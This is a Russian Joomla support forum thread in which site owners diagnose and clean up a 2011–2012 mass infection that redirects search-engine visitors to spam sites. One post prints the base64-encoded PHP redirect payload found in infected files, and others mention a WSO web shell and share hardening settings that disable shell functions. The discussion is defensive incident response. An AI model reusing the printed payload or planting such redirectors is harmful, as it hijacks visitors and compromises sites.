LiveInternetMail.ru
Форум русской поддержки Joomla!® CMS
28.12.2014, 10:38:44 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Войти Регистрация Помощь  
Страниц: [1] 2  Все   Вниз
  Добавить закладку  |  Печать  
Автор Тема: Переадресация, Редирект, Вирус  (Прочитано 17405 раз)
0 Пользователей и 1 Гость смотрят эту тему.
asdf27
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Пол: Мужской
Сообщений: 120



« : 04.11.2011, 18:55:33 »

Доброго времени, форумчане.

Столкнулся с проблемой: со всех входящих ссылок происходит переадресация. Т.е. если ввести в ПС адрес сайта, а потом перейти, он перекинет сперва на http://goooogle.osa.pl, а потом по своему усмотрению (казино или диета). Если вбить напрямую, откроет сайт без проблем.

На VPS'ке дебиан, крутится десяток сайтов, все на J 1.5. И на всех такая байда. htaccess чистый.

Для пробы закидывал чистый index.html, с ПС идет нормально. Дальше начал рыть в index.php:

После удаления 21-ой строчки
Код:
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );

с ПС переходит, хоть и ругается ошибками.

Дальше я пошел в файл includes/defines.php и снова нарыл строку, после удаления которой с ПС сайт открывает, но так же, с ошибками
Код:
$parts = explode( DS, JPATH_BASE );

Куда дальше?  !
« Последнее редактирование: 06.11.2011, 00:54:52 от asdf27 » Записан
asdf27
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Пол: Мужской
Сообщений: 120



« Ответ #1 : 06.11.2011, 00:00:53 »

Разобрался... Жаль что никто не помог, сэкономил бы время.

Был вирус, который редиректил на поиск, после на нужный сайт.

1. В теле php файла плагина найден код
Код:
("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwidHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhbmRleC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtYWlsLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ29vb29nbGUub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));

Найти не сложно, у меня в 4000+ файлах был Azn в самой шапке.

Далее, на сайте http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/ раскодировал, увидел присутствие урла, на который редиректит сайт.

Ну и через Notepad++ поисках в файлах - замена. Только муторно теперь, 10+ сайтов на серваке и каждый надо скачать, почистить и залить обратно Azn
Записан
fedos23
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 36


« Ответ #2 : 29.12.2011, 11:27:28 »

А через что хакнули? неизвестно?
У меня такая же байда...
Записан
nsfgh
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 8


« Ответ #3 : 29.12.2011, 17:33:09 »

Тоже самое сегодня случилось, просто восстановил из резервной копии. В логах техподдержка хостинга не разобралась.
Записан
asdf27
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Пол: Мужской
Сообщений: 120



« Ответ #4 : 05.01.2012, 14:14:31 »

А через что хакнули? неизвестно?
У меня такая же байда...

На многих папках 777 стояли права. Но больше думаю на забытый, не удаленный Total cmd с сохраненным паролем.
Записан
ASBorzakovsky
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #5 : 07.01.2012, 07:15:13 »

аналогичная проблема, редирект из поисковых систем.
посмотрел сайт, посмотрел здоровые файлы, не пойму, зачем надо было удалять require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
эта строка идёт в стандарте.

в индексе удалил почти такой же код Base 64, всё равно редиректит, как и от куда, не пойму.
Записан
ASBorzakovsky
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #6 : 07.01.2012, 07:16:08 »

хакнули скорее всего через FTP, total CMD.
Записан
wishlight
Практически профи
*******

Репутация: +148/-0
Offline Offline

Пол: Мужской
Сообщений: 2375


skype aqaus.com


« Ответ #7 : 07.01.2012, 09:34:42 »

И вам переписали все файлы. Я так понял, это был акт новогоднего вандализма. Надо перезаливать и вычищать.
Записан
ASBorzakovsky
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #8 : 07.01.2012, 15:44:40 »

а что перезалить?? поискал выборочно, не вижу больше нигде такого кода.
index я вычистил, не пойму, что сейчас срабатывает?
Записан
oriol
Живу я здесь
******

Репутация: +100/-4
Offline Offline

Сообщений: 1059


« Ответ #9 : 07.01.2012, 15:57:42 »

делай бекап распаковывай но локалке и через поиск в  Total Commander  ищи

потом в php.ini выставь так
Код:
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=полный путь к вашей директории
Записан
wishlight
Практически профи
*******

Репутация: +148/-0
Offline Offline

Пол: Мужской
Сообщений: 2375


skype aqaus.com


« Ответ #10 : 07.01.2012, 16:47:20 »

Текст реплейсер и ищет и заменяет. Понравился очень.
Записан
ASBorzakovsky
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #11 : 07.01.2012, 17:28:38 »

инфицируются в основном два файла, но местами больше

это defines.php и index.php
Записан
wishlight
Практически профи
*******

Репутация: +148/-0
Offline Offline

Пол: Мужской
Сообщений: 2375


skype aqaus.com


« Ответ #12 : 07.01.2012, 18:04:18 »

Это новогодняя вирусная атака. Почти 100% перегажены почти все файлы. Текст реплейсер найдет, какие именно Azn
Записан
ASBorzakovsky
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #13 : 08.01.2012, 05:58:02 »

Пострадавшие, напишите на каком хосте.
Мои личне наблюдения, хакнули сайты только на хосте timeweb, остальные ресурсы не пострадали.
Вывод - это не тотал командер.
Записан
wishlight
Практически профи
*******

Репутация: +148/-0
Offline Offline

Пол: Мужской
Сообщений: 2375


skype aqaus.com


« Ответ #14 : 08.01.2012, 10:48:54 »

Вполне возможно таймвеб хакнули?
Записан
asdf27
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Пол: Мужской
Сообщений: 120



« Ответ #15 : 08.01.2012, 17:10:54 »

У меня hc.ru . Для поиск хорошо подходит Notepad++.
Записан
ASBorzakovsky
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #16 : 08.01.2012, 17:46:42 »

Ясно, значит не только timweb.
Но пришли со стороны хостера, сейчас логи буду изучать.
Записан
ASBorzakovsky
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #17 : 10.01.2012, 17:46:29 »

атака продолжается, только я всё зачистил, поменял все пароли и явки, два дня, все сайты опять загажены, один пациент очень сильно, загажены все php файлы, в одном файле по 10 раз, это трындец.....

Кстати не всё на CMS Joomla.
Записан
wishlight
Практически профи
*******

Репутация: +148/-0
Offline Offline

Пол: Мужской
Сообщений: 2375


skype aqaus.com


« Ответ #18 : 10.01.2012, 19:26:32 »

Разве что перенести сайты на другого хостера, разбить на несколько аккаунтов, перед этим сменить пароли администраторов, залить поверх базы данных (снести все файлы и залить свежие версии).
Записан
madal
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 15


« Ответ #19 : 10.01.2012, 20:02:05 »

Сегодня сносил тот же самый вирус. Написали скрипт который все файлы заменял. Найдено аж 106тыс зараженных файлов.
Записан
flyingspook
Moderator
*****

Репутация: +168/-9
Offline Offline

Сообщений: 2201


« Ответ #20 : 11.01.2012, 10:31:38 »

хорошо школьники новый год справили Smiley
Записан
magyar
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 16


« Ответ #21 : 11.01.2012, 11:40:01 »

такая же байда больше 60 сайтов с этой хренью, 95% Joomla от 1.5.17 до 1.5.25 и 1.7.3, wordpress точно так же взломан, еще 4 сайта не на нашем хостинге. сейчас восстанавливаюсь, но что предпринять для предотвращения инцидента?
Записан
magyar
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 16


« Ответ #22 : 11.01.2012, 11:42:00 »

как думаете есть ли смысл в отдел "К" обращаться?
Записан
flyingspook
Moderator
*****

Репутация: +168/-9
Offline Offline

Сообщений: 2201


« Ответ #23 : 11.01.2012, 12:12:18 »

отдел "К" обращаться должен замученный вами хостер, а не вы
а вам необходимо на столько его замучить, или просто всем съехать разом и негатив написать везде, тогда он зашевелиться быстрее Smiley
Записан
asdf27
Осваиваюсь на форуме
***

Репутация: +7/-0
Offline Offline

Пол: Мужской
Сообщений: 120



« Ответ #24 : 11.01.2012, 15:51:34 »

106к... Сколько же у вас сайт весит? Azn
Вся проблема, как мне кажется, в правах на папки. Когда несколько доменов, аппач работает под одним юзверем, и сломав один домен, вирь легко пробирается в другие папки.

Всю ночь провозился со своим debian, но php как cgi так и не смог заставить работать. Видимо, придется менять хоста. Уже запарился чистить.
Записан
n55
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #25 : 12.01.2012, 18:32:39 »

У меня на Sweb также все сайта на Joomla заражены.
Причем на одном - всего два файлика, а на другом - ооочень много, больше сотни.


Записан
wishlight
Практически профи
*******

Репутация: +148/-0
Offline Offline

Пол: Мужской
Сообщений: 2375


skype aqaus.com


« Ответ #26 : 12.01.2012, 19:00:14 »

Да уж... и смотрю все на больших хостингах.
Записан
shapeout
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 18

все что связано с велосипедами - www.veloarena.ru


« Ответ #27 : 14.01.2012, 12:21:06 »

Всем привет.
У меня тоже до НГ сайты хакнули.
Как я понял у меня было 4 вируса.
один - это eval(base64_decode потом идёт куча всего, что зашифрованно. (в основном вирус который редиректор)
второй - это шелл, в моём случае WSO 2 лежал в components/com_search файл называется class.php Если его внимательно посмотреть, то можно заметить куски того "зашифрованного гамна" из которого собирается первый  вирус, но это моё предположение. Еще нашел один шелл, один-в-один как этот, тока лежал в папке mod_myblog_arhive, внутри шелла есть описание его и кем написан.
Код:
  * WSO 2
 * Web Shell by oRb
третье - это в папке plugins лежит папка mod в которой есть архив (сам себя заархивированный) и собсно сам по себе вирус. Он, как я понял, занимается спапом. Я просто снёс папку и всё. Особо разбираться некогда было.
четвертое - это всем уже (наверное) известный редиректор. Azn сам редиректор выглядит как
Код:
if(preg_match('!MIDP|WAP|Windows.CE и далее куча-куча перечислений
и второй
Код:
<script>b=new функция, потом всё в зашифрованном виде типа [b]-t+число[/b]куча-куча
и всё это расшифровывается eval( - собсно по этому выражению я и искал.
Искал я всё это безобразие фаром по тексту в файле. Муторная скажу я Вам работёнка, но уж лучше в ручную, чем чё нить важное потереть... Возможно, что всё мной рассказанное - это одно целое.
Как я боролся.
Первым делом в корень сайта кинул файл .ftpaccess - с содержанием
Код:
<Limit ALL>
Allow from 127.0.0.1 // здесь IP разрешенному доступ
Deny from all // всем (остальным) запретить
ListOptions "+a" // скрыть все файлы начинающиеся с точки
</Limit>
Можно еще в Google порыть, найти еще настроек.
Начал искать по тексту вируса, в каких еще файлах встречается... На всякий пожарный делал копии, изучал и искал. Собсно всё.
Ща еще базу буду проверять, вдруг там тоже нагадили.

Вот теперь сижу и думаю, как базу подчистить? Я там стока интересного нашел... Никто случаем не знает?
« Последнее редактирование: 14.01.2012, 22:42:42 от shapeout » Записан
oriol
Живу я здесь
******

Репутация: +100/-4
Offline Offline

Сообщений: 1059


« Ответ #28 : 14.01.2012, 13:25:30 »

Вот htaccess от Nicholas K. Dionysopoulos ведущего разработчика AkeebaBackup.com
возможно кто то что то найдет для себя полезное

Показать текстовый блок

Это своего рода шаблон который требует некоторых изменений
__________________________________________________________________________

Также что то можно использовать отсюда

Показать текстовый блок

Записан
mamedovvs
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 7


« Ответ #29 : 24.01.2012, 18:03:31 »

Та же проблема все сайты на Joomla заражены. Очистил и удалил все ftp аккаунты и что, через день та же хрень все заражены. Написал скриптик на python если нужно могу выложить, для поиска и удаления строки eval. Но главная причина понять почему так происходит, может быть нужно права расставить правильные.
Записан
Страниц: [1] 2  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Рейтинг@Mail.ru Rambler Top100 Powered by SMF 1.1.20 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet